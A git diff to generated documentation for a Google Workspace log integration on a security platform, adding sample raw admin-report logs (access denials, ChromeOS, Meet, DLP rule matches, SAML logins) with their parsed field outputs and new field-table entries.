diff --git a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md index 8dc3e4606..3952fdd13 100644 --- a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md +++ b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md @@ -17,8 +17,8 @@ In details, the following table denotes the type of events produced by this inte | Name | Values | | ---- | ------ | | Kind | `` | -| Category | `authentication`, `configuration`, `file`, `iam`, `session` | -| Type | `access`, `admin`, `change`, `connection` | +| Category | `authentication`, `configuration`, `file`, `iam`, `session`, `web` | +| Type | `access`, `admin`, `allowed`, `change`, `connection`, `deletion`, `denied`, `info` | 
@@ -27,6 +27,61 @@ In details, the following table denotes the type of events produced by this inte This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog.md) and hunting activities in the [events page](/xdr/features/investigate/events.md). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma.md) and to leverage the full potential of the collected data. +=== "test_access_sample_1.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + 
"report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } + + ``` + + === "test_admin_sample1.json" ```json 
@@ -374,6 +429,99 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_chrome_sample_1.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "manufacturer": "Linux Foundation", + "model": { + "identifier": "0x2", + "name": "2.0 root hub" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } + + ``` + + +=== "test_chrome_sample_2.json" + + ```json + + { + 
"message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } + + ``` + + === "test_drive_sample.json" ```json 
@@ -567,6 +715,103 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_end_call.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"na
me\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + 
"ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } + + ``` + + +=== "test_end_call_no_ip.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_
recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } + + ``` + + === "test_groups_entre_sample1.json" ```json @@ -661,13 +906,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "transport": "udp" }, "related": { + "ip": [ + "5555:333:333:5555:5555:5555:5555:5555" + ], "user": [ "jone.doe" ] }, + "source": { + "address": "5555:333:333:5555:5555:5555:5555:5555", + "ip": "5555:333:333:5555:5555:5555:5555:5555" + }, "user": { "domain": "test.com", - "email": "jone.doe@test.com", + "email": "joe.done@test.com", "id": "1098488062555", "name": "jone.doe" } 
@@ -727,6 +979,230 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_rules_sample_1.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": 
{ + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } + + ``` + + +=== "test_rules_sample_2.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro 
IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } + + ``` + + +=== "test_saml_login_success.json" + + ```json + + { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } + + ``` + + +=== "test_saml_login_success_1.json" + + ```json + + { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } + + ``` + + === "test_suspend_user.json" ```json 
@@ -1050,11 +1526,13 @@ The following table lists the fields that are extracted, normalized under the EC |`event.action` | `keyword` | The action captured by the event. | |`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | |`event.dataset` | `keyword` | Name of the dataset. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | |`file.gid` | `keyword` | Primary group ID (GID) of the file. | |`file.name` | `keyword` | Name of the file including the extension, without the directory. | |`file.owner` | `keyword` | File owner's username. | |`file.type` | `keyword` | File type (file, dir, or symlink). | +|`google.report.access.application` | `keyword` | Application name | |`google.report.actor.email` | `keyword` | | |`google.report.chat.message.id` | `keyword` | Message id | |`google.report.chat.room.name` | `keyword` | Room name | 
@@ -1062,10 +1540,21 @@ The following table lists the fields that are extracted, normalized under the EC |`google.report.parameters.name` | `keyword` | Name of the item associated with the activity | |`google.report.parameters.value` | `keyword` | Value of the item associated with the activity | |`google.report.parameters.visibility` | `keyword` | Visibility of the Drive item associated with the activity | +|`google.report.rule.data_source` | `keyword` | Data source | +|`google.report.rule.name` | `keyword` | Name of the rule | +|`google.report.rule.scan_type` | `keyword` | Scan type | +|`google.report.rule.severity` | `keyword` | Severity of the rule | +|`google.report.rule.type` | `keyword` | Rule type | +|`google.report.saml.application_name` | `keyword` | Saml SP application name | +|`google.report.saml.initiator` | `keyword` | SAML requester of saml authentication | +|`google.report.saml.status_code` | `keyword` | SAML response status | |`google.report.token.app_name` | `keyword` | Token authorization application name | |`google.report.token.type` | `keyword` | Token type | +|`host.name` | `keyword` | Name of the host. | +|`host.os.full` | `keyword` | Operating system name, including the version or code name. | |`network.application` | `keyword` | Application level protocol name. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | +|`organization.name` | `keyword` | Organization name. | |`source.ip` | `ip` | IP address of the source. | |`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.email` | `keyword` | User email address. | diff --git a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md index 7b964ab56..906050a77 100644 
--- a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md +++ b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md @@ -4,6 +4,73 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "test_access_sample_1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:23:22.470Z", + "uniqueQualifier": "-7203312395540000000", + "applicationName": "context_aware_access", + "customerId": "C02i38lll" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\"", + "actor": { + "callerType": "USER", + "email": "john.doe@test.com", + "profileId": "117564289545555555555" + }, + "ipAddress": "9.3.2.1", + "events": [ + { + "type": "CONTEXT_AWARE_ACCESS_USER_EVENT", + "name": "MONITOR_MODE_ACCESS_DENY_EVENT", + "parameters": [ + { + "name": "CAA_ACCESS_LEVEL_APPLIED", + "multiValue": [ + "is admin-approved IOS", + "is admin-approved android", + "Is Corporate Device" + ] + }, + { + "name": "CAA_ACCESS_LEVEL_UNSATISFIED", + "multiValue": [ + "is admin-approved android", + "Crowdstrike Compliant Device", + "is admin-approved IOS", + "Is Corporate Device" + ] + }, + { + "name": "CAA_APPLICATION", + "value": "GMAIL" + }, + { + "name": "BLOCKED_API_ACCESS", + "multiValue": [ + "GMAIL" + ] + }, + { + "name": "CAA_DEVICE_ID", + "value": "UNKNOWN" + }, + { + "name": "CAA_DEVICE_STATE", + "value": "No Device Signals" + } + ] + } + ] + } + ``` + + + === "test_admin_sample1" 
@@ -479,6 +546,142 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_chrome_sample_1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-08T13:17:42.050Z", + "uniqueQualifier": "821596950209300000", + "applicationName": "chrome", + "customerId": "C01x70000" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zF\"", + "actor": { + "callerType": "USER", + "profileId": "105250506097979777777" + }, + "events": [ + { + "type": "CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE", + "name": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "parameters": [ + { + "name": "TIMESTAMP", + "intValue": "1731071860000" + }, + { + "name": "EVENT_REASON", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "name": "DEVICE_NAME", + "value": "S5NXNZ00A000000" + }, + { + "name": "CLIENT_TYPE", + "value": "CHROME_OS_DEVICE" + }, + { + "name": "DEVICE_PLATFORM", + "value": "ChromeOS 16033.51.0" + }, + { + "name": "DIRECTORY_DEVICE_ID", + "value": "4ebc77ae-ce6b-4857" + }, + { + "name": 